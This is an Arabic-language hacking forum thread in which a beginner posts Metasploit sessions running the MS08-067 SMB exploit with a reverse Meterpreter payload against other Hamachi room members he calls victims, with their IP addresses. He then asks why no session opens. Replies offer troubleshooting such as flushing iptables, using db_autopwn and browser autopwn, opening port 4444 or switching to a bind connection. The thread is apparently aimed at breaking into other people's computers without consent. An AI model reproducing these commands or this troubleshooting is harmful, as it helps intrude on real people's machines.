اين المشكلة او الخطأ metasploit
تقييم المستخدمين: / 0
عاديممتاز 
الكاتب almechkor   
الاثنين, 13 يونيو 2011 16:49

السلام عليكم و رحمة الله و بركاته

اخواني هذا السؤال قد يستفيد منه معظم المبتدئين

انا تعلمت الاختراق بواسطة metasploit عبر البرنامج hamachi حيث يقوم بعمل شبكة داخلية وهمية بين اعضاء الغرف جربت احد الطرق للاختراق عبر الايبي و اشتغلت عند البعض و البعض الاخر و البعض الاخر و هو الاغلبية لم تشتغل عندهم
و ها هي الاوامر التي اطبقها و المشاكل  التي تطلع لي

                                                      المشكلة الاولى

       =[ msf v3.2-release
+ -- --=[ 320 exploits - 217 payloads
+ -- --=[ 20 encoders - 6 nops
       =[ 99 aux

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 5.190.83.55
lhost => 5.190.83.55
msf exploit(ms08_067_netapi) > set rhost 5.189.73.100
rhost => 5.189.73.100
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2+ - lang:Unknown
[*] Could not determine the exact service pack
[*] Exploit completed, but no session was created.

                                                        المشكلة الثانية

نفس الاوامر السابقة مع تغيير ip الضحية

msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:French
[*] Selected Target: Windows XP SP2 French (NX)
[*] Triggering the vulnerability...
[*] Exploit completed, but no session was created

                                                  المشكلة الثالثة

هذه المشكلة بالنسبة ل sp3

msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:French
[*] Selected Target: Windows XP SP3 French (NX)
[*] Triggering the vulnerability...
[*] Exploit completed, but no session was created.

 

 

 

ملاحظة : انا اظن المشكلة هي ان الضحية يملك مكافح فيروسات اذا كانت هذه هي المشكلة ارجو من الاساتذة الكرام وضع الح

و شكرا مسبقا ^^

التعليقات (12)Add Comment
mansoor
Exploit completed, but no session was created
أرسلت بواسطة: mansoor في June 14, 2011
حسب ما قريت انه الاختراق تم لكن ما حصل سشن بينك وبين العمليل

طيب ...

ما ادري بس اتوقع لو تطفي الـiptables
iptables -F

echo 1 > /proc/sys/net/ipv4/ip_forward





almechkor
انا مجرد مبتدئ
أرسلت بواسطة: almechkor في June 14, 2011
اخي انا اسف لكنني لا اعلم هذا iptables -F
من فضلك اريد منك ان تشرح لي معناها و ما هي ؟
mansoor
...
أرسلت بواسطة: mansoor في June 14, 2011
الiptables هو عبارة عن firewall في اللنكس

وهذي معلومات من الممكن ان تفيدك
http://www.wisegeek.com/what-is-iptables.htm

اما iptables -F فا هو لاطفاء الفايرول

طه بولاهمي
...
أرسلت بواسطة: طه بولاهمي في June 14, 2011
حسب علمي فان هذا الامر هو لإعادة ضبط خصائص ال iptables
يعني انه لا يقوم باغلاق firewall فقط، بل محو جميع الخصائص التي قمت بوضعها
almechkor
شككرا لكم اخواني على المساعدة و لكن
أرسلت بواسطة: almechkor في June 14, 2011
اخواني انا اشتغل بنظام windows xp sp3 و الضحية تكون اما windows xp sp 2 او sp3 لهذا لم افهم قصدك هههههههههههه اخواني انا لا اتقن اللغة الانجليزية فاللغة الثانية عندي هي الفرنسية
almechkor
parfeu خاصتي معطل ^^
أرسلت بواسطة: almechkor في June 14, 2011
لقد عطلت الفايرول خاصتي و تطلع لي نفس المشكلة
طه بولاهمي
...
أرسلت بواسطة: طه بولاهمي في June 14, 2011
اخي، اضن ان الخطأ بسبب ان بعض الاشخاص قاموا بترقيع هذه الثغرة على اجهزتهم.
انصحك بتجريب ثغرة اخرى.
بالنسبة لل iptables هو firewall المعتمد من قبل Linux
بالمناسبة، ماهي جنسيتك ؟ :)
mansoor
db_autopwn
أرسلت بواسطة: mansoor في June 15, 2011
صراحة انصحك بتجربة db_autopwn لانها جاره تجرب الثغرات واحده تلو الاخرى

اما بنسبه لثغرات ال browser انصحك ان تتابع هاذا الفيديو

http://www.isecur1ty.org/video-tutorials/programs-tools/388-browser-autopwn-metasploit.html

حيث انها تفحص جهاز الضحية وتحدد نوع المتصفح وتستغله بشكل تلقائي

وشكراً
almechkor
مغربي
أرسلت بواسطة: almechkor في June 19, 2011
انا مغربي يا اخواني هههههههههههههه
CROCODILE_KSA
crocodile_ksa
أرسلت بواسطة: CROCODILE_KSA في June 22, 2011
تأكد من فتح بورت 4444 في الراوتر
عبد الحميد
سلام
أرسلت بواسطة: عبد الحميد في July 03, 2011
لا علاقة للبورت 4444 بالامر
لا تستعمل الاتصال العكسي بل المباشر
زيد القريشي
...
أرسلت بواسطة: زيد القريشي في July 04, 2011
اخي مشكلتك قد يكون لها اكثر من سبب , الاحتمال الاكبر هو ان الثغرة قد تم ترقيعها على الجهاز الذي تحاول اختراقه

أضف تعليق
يجب عليك الاشتراك بالموقع لتتمكن من كتابة التعليقات, الاشتراك مجاني ويستغرق بضع ثوان فقط!
اذا كنت مشترك مسبقا في الموقع فضلاً قم بتسجيل الدخول.

busy
 

SecurityTargets